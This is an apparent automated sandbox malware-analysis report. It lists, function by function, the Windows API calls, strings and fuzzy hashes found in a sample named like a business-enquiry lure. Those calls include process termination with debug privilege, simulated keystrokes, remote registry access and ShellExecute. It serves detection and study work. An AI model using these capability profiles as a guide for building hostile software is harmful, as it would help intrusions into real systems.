                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                • String ID:
                                • API String ID: 3637404534-0
                                • Opcode ID: ff3821c2e0cecb4ad302bdb77b987fdc8c5cda3d5418a72d6ec64c9287b0356c
                                • Instruction ID: b3e4de9e7a4590c66e6fd9b8ea8ff46678881b9e947579796c1b8d3560996ff3
                                • Opcode Fuzzy Hash: ff3821c2e0cecb4ad302bdb77b987fdc8c5cda3d5418a72d6ec64c9287b0356c
                                • Instruction Fuzzy Hash: 8F81AE71504240ABC720EF65CC95FABBBE8EF84714F144A1DF6569B2A1DB30DE04DB92
                                APIs
                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CCB204
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InvalidateRect
                                • String ID:
                                • API String ID: 634782764-0
                                • Opcode ID: 2c9c367d427fd77073a636f5dacba0841d78e5977e88432212a1d54185da5aea
                                • Instruction ID: aa8ce72ca41c121f602cef65f7dcf0b68e4565f5e88092203a3ab9a23d8ce731
                                • Opcode Fuzzy Hash: 2c9c367d427fd77073a636f5dacba0841d78e5977e88432212a1d54185da5aea
                                • Instruction Fuzzy Hash: EF519130600245BEEF249FA9CCCAF9E7B65EF05320F248519F925D61B1CB71EE509B51
                                APIs
                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00CDE9EA
                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CDEA0B
                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CDEA20
                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00CDEA3D
                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CDEA64
                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C7A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00CDEA6F
                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CDEA8C
                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C7A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00CDEA97
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                • String ID:
                                • API String ID: 1268354404-0
                                • Opcode ID: b9f719c9b36f96e84c066e9e253f735aebe0db3211ff3da82839fca5b240c5ea
                                • Instruction ID: bc0b491f4073360e2b4089286d030ecee4c53edfef01fb0a382a56e28979b200
                                • Opcode Fuzzy Hash: b9f719c9b36f96e84c066e9e253f735aebe0db3211ff3da82839fca5b240c5ea
                                • Instruction Fuzzy Hash: 92516A74600205AFDB20EF65CC81FAE7BB5BB58754F108619FA1A9B290D770ED81AB50
                                APIs
                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00CDE9A0,00000004,00000000,00000000), ref: 00C7F737
                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00CDE9A0,00000004,00000000,00000000), ref: 00C7F77E
                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00CDE9A0,00000004,00000000,00000000), ref: 00CDEB55
                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00CDE9A0,00000004,00000000,00000000), ref: 00CDEBC1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: 505a83bb067fe0e5df9348a84281fb9238b56bf33e41fb737c3da0fbd7fa8ab2
                                • Instruction ID: 73e788ff6b38b9e547aaff52d2d7e83756a1922c2e45bfc0554512f5ff8fc9aa
                                • Opcode Fuzzy Hash: 505a83bb067fe0e5df9348a84281fb9238b56bf33e41fb737c3da0fbd7fa8ab2
                                • Instruction Fuzzy Hash: 1E412C302046C0EBDB3D5B398CC8B3A7A956B55315F24C82FF1AF8B661C670B942D721
                                APIs
                                  • Part of subcall function 00C9E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9E158
                                  • Part of subcall function 00C9E138: GetCurrentThreadId.KERNEL32 ref: 00C9E15F
                                  • Part of subcall function 00C9E138: AttachThreadInput.USER32(00000000,?,00C9CDFB,?,00000001), ref: 00C9E166
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C9CE06
                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C9CE23
                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C9CE26
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C9CE2F
                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C9CE4D
                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C9CE50
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C9CE59
                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C9CE70
                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C9CE73
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                • String ID:
                                • API String ID: 2014098862-0
                                • Opcode ID: 91aefda5ee6837a17560e5d63d86dd271904310896574c10f59dbeba1a073449
                                • Instruction ID: 73f92ee428e4ae3e09eced364b9bf46d56c550e11ea4084fc306f738a2905a5c
                                • Opcode Fuzzy Hash: 91aefda5ee6837a17560e5d63d86dd271904310896574c10f59dbeba1a073449
                                • Instruction Fuzzy Hash: 9E11C4B1550618BFFB106F648CCEF6E7A2DDB587A4F500415F3426F1E0C9F26C419AA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID: NULL Pointer assignment$Not an Object type
                                • API String ID: 0-572801152
                                • Opcode ID: 665d0f1b619be9068527aa80a0fe12a82c9f862d20992c0a5d5cdf28411f5d08
                                • Instruction ID: 9bcbf4ec4c74c051e0e434a70916ace3e584c2b290c5c8a97349b47b16748406
                                • Opcode Fuzzy Hash: 665d0f1b619be9068527aa80a0fe12a82c9f862d20992c0a5d5cdf28411f5d08
                                • Instruction Fuzzy Hash: F7E1B171A00219AFDF10DFA4C8C5AEE7BB5FF58314F148029F95AAB281D7709E41DBA0
                                APIs
                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CC9926
                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CC993A
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CC9954
                                • _wcscat.LIBCMT ref: 00CC99AF
                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CC99C6
                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CC99F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$Window_wcscat
                                • String ID: SysListView32
                                • API String ID: 307300125-78025650
                                • Opcode ID: 0a8c69fa57a96b0af12036e5a4e1ef291acce04d2e8395cd3d44751313aae5f6
                                • Instruction ID: a0d0b640de4d7c5c5a094cab22d4aaf0ec538b7ae1c9c4dd349aed5b426dc777
                                • Opcode Fuzzy Hash: 0a8c69fa57a96b0af12036e5a4e1ef291acce04d2e8395cd3d44751313aae5f6
                                • Instruction Fuzzy Hash: C641AF71A00348AFEB219F64C889FEE77A8EF08354F10442AF599E7291D6719A849B60
                                APIs
                                  • Part of subcall function 00CA6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CA6F7D
                                  • Part of subcall function 00CA6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CA6F8D
                                  • Part of subcall function 00CA6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CA7022
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CC168B
                                • GetLastError.KERNEL32 ref: 00CC169E
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CC16CA
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CC1746
                                • GetLastError.KERNEL32(00000000), ref: 00CC1751
                                • CloseHandle.KERNEL32(00000000), ref: 00CC1786
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                • String ID: SeDebugPrivilege
                                • API String ID: 2533919879-2896544425
                                • Opcode ID: 8f06d443e518b1178e92cb82b3765141c62878df2f14ba4de7d3039ffb1d43e0
                                • Instruction ID: d17d9028d2dc8ba1471b34c583aca88d9154468019b795101c94dedf93862dbf
                                • Opcode Fuzzy Hash: 8f06d443e518b1178e92cb82b3765141c62878df2f14ba4de7d3039ffb1d43e0
                                • Instruction Fuzzy Hash: B241ED71600202AFDB04EF65CCE6FADB7A5AF45318F088048F9069F292DBB5E940DB51
                                APIs
                                • LoadIconW.USER32(00000000,00007F03), ref: 00CA62D6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: IconLoad
                                • String ID: blank$info$question$stop$warning
                                • API String ID: 2457776203-404129466
                                • Opcode ID: 1fe5f71b63ccc801a29a8808ba475e45698b062bc0022e86deeb4cfadadb4eeb
                                • Instruction ID: 682666b3cecb0aa78e137849ab11ba4d92fef1e0e673b8ffae57a70da1deff2b
                                • Opcode Fuzzy Hash: 1fe5f71b63ccc801a29a8808ba475e45698b062bc0022e86deeb4cfadadb4eeb
                                • Instruction Fuzzy Hash: AD11DD71208347BFD7055B55DC42FBE77DC9F1772CB180129F511A62C2EBB06B415268
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00CA7595
                                • LoadStringW.USER32(00000000), ref: 00CA759C
                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CA75B2
                                • LoadStringW.USER32(00000000), ref: 00CA75B9
                                • _wprintf.LIBCMT ref: 00CA75DF
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CA75FD
                                Strings
                                • %s (%d) : ==> %s: %s %s, xrefs: 00CA75DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HandleLoadModuleString$Message_wprintf
                                • String ID: %s (%d) : ==> %s: %s %s
                                • API String ID: 3648134473-3128320259
                                • Opcode ID: ab51255fdfcb2c4395c47af431f3223eb7ae150ead03821eccfa7c4d9f2d8877
                                • Instruction ID: 5a960a8eb0795adc7f4cb5e99be7b05ce3c189798216858aea48b14229afef86
                                • Opcode Fuzzy Hash: ab51255fdfcb2c4395c47af431f3223eb7ae150ead03821eccfa7c4d9f2d8877
                                • Instruction Fuzzy Hash: 900162F2904249BFE711AB949CC9FEA776CD704305F000495B716DA041EA749E848B35
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00CC3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC2AE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharConnectRegistryUpper_memmove
                                • String ID:
                                • API String ID: 3479070676-0
                                • Opcode ID: 333f42bd63954a85bde9d0c55883a82768e892aff83cd78e3d31c1358f2e0b94
                                • Instruction ID: 4a0d58661f485358747c7ed8d5694ef764cbf6d909e6ff77416f512575cce3a5
                                • Opcode Fuzzy Hash: 333f42bd63954a85bde9d0c55883a82768e892aff83cd78e3d31c1358f2e0b94
                                • Instruction Fuzzy Hash: 06916831604201AFDB10EF54C891F6EB7E5FF88314F14881DF9969B2A2DB31EA45EB42
                                APIs
                                • __mtinitlocknum.LIBCMT ref: 00C8B744
                                  • Part of subcall function 00C88A0C: __FF_MSGBANNER.LIBCMT ref: 00C88A21
                                  • Part of subcall function 00C88A0C: __NMSG_WRITE.LIBCMT ref: 00C88A28
                                  • Part of subcall function 00C88A0C: __malloc_crt.LIBCMT ref: 00C88A48
                                • __lock.LIBCMT ref: 00C8B757
                                • __lock.LIBCMT ref: 00C8B7A3
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00D16948,00000018,00C96C2B,?,00000000,00000109), ref: 00C8B7BF
                                • EnterCriticalSection.KERNEL32(8000000C,00D16948,00000018,00C96C2B,?,00000000,00000109), ref: 00C8B7DC
                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 00C8B7EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                • String ID:
                                • API String ID: 1422805418-0
                                • Opcode ID: c38bd870bc3aa9a07ea4dfe20be532d7991eeedf1325d07bb55b14d1647a97f5
                                • Instruction ID: 44d17212108fdfaf1c34d24450fd575f34ba7c7b1a5868f265398eeaafaeb231
                                • Opcode Fuzzy Hash: c38bd870bc3aa9a07ea4dfe20be532d7991eeedf1325d07bb55b14d1647a97f5
                                • Instruction Fuzzy Hash: 5A411771D007159BEB10BF68D8853ACBBA4BF5133DF248328E425AB2D2D7749D41CBA8
                                APIs
                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CAA1CE
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CAA205
                                • EnterCriticalSection.KERNEL32(?), ref: 00CAA221
                                • _memmove.LIBCMT ref: 00CAA26F
                                • _memmove.LIBCMT ref: 00CAA28C
                                • LeaveCriticalSection.KERNEL32(?), ref: 00CAA29B
                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CAA2B0
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CAA2CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                • String ID:
                                • API String ID: 256516436-0
                                • Opcode ID: 621d1b90ca2d1bace3591812803c2ee9d5662dd2e3af568df0072e81726ceebf
                                • Instruction ID: 37575b86f4f2f46e4c86cda536bd427a77ba0622cea4b5818ae510d8732f7a10
                                • Opcode Fuzzy Hash: 621d1b90ca2d1bace3591812803c2ee9d5662dd2e3af568df0072e81726ceebf
                                • Instruction Fuzzy Hash: 82319E31900205ABDB00EFA4DC89AAEB7B8EF45324F1480A5E905AB256DB71DE15DBA1
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 00CC8CF3
                                • GetDC.USER32(00000000), ref: 00CC8CFB
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CC8D06
                                • ReleaseDC.USER32(00000000,00000000), ref: 00CC8D12
                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00CC8D4E
                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CC8D5F
                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CCBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00CC8D99
                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CC8DB9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                • String ID:
                                • API String ID: 3864802216-0
                                • Opcode ID: bb766a7c0769e6634331648d036f35eed79c0f79ff20b76ca184c387d1c9238b
                                • Instruction ID: a260027f0edbad4b80b77fe704f329f9d49956bc35e1cd16bda113447b679e89
                                • Opcode Fuzzy Hash: bb766a7c0769e6634331648d036f35eed79c0f79ff20b76ca184c387d1c9238b
                                • Instruction Fuzzy Hash: 8F316B72200254BFEB108F50CC8AFEB3BADEF49755F084065FE0A9E191CAB59941CB70
                                APIs
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                  • Part of subcall function 00C63BCF: _wcscpy.LIBCMT ref: 00C63BF2
                                • _wcstok.LIBCMT ref: 00CB1D6E
                                • _wcscpy.LIBCMT ref: 00CB1DFD
                                • _memset.LIBCMT ref: 00CB1E30
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                • String ID: X
                                • API String ID: 774024439-3081909835
                                • Opcode ID: e856eaaaf463c60cc198f3abf0e4e06cb4ce12637793009cef184191518c2cde
                                • Instruction ID: 7140121347e804b7b88df6f7cbeb59afa0d113cb4ddfa574f5e35e17e72550ad
                                • Opcode Fuzzy Hash: e856eaaaf463c60cc198f3abf0e4e06cb4ce12637793009cef184191518c2cde
                                • Instruction Fuzzy Hash: 8EC18C316083409FC724EF64C8D5AAAB7E4FF85310F44492DF89A972A2DB30ED45DB92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4847c749878e149dcea09fe1d2a71bcc878e8199d9dbb804fbaa3df3392023d
                                • Instruction ID: f35b9a5ea1ae59e72b1688911cb54e8cafa39d1d8866f3ce4eac99a1c41eab53
                                • Opcode Fuzzy Hash: f4847c749878e149dcea09fe1d2a71bcc878e8199d9dbb804fbaa3df3392023d
                                • Instruction Fuzzy Hash: 5C714A71900109EFCB15CF99CC89BAEBB74FF85314F14C159F92AAA251C734AE42DB64
                                APIs
                                • _memset.LIBCMT ref: 00CC214B
                                • _memset.LIBCMT ref: 00CC2214
                                • ShellExecuteExW.SHELL32(?), ref: 00CC2259
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
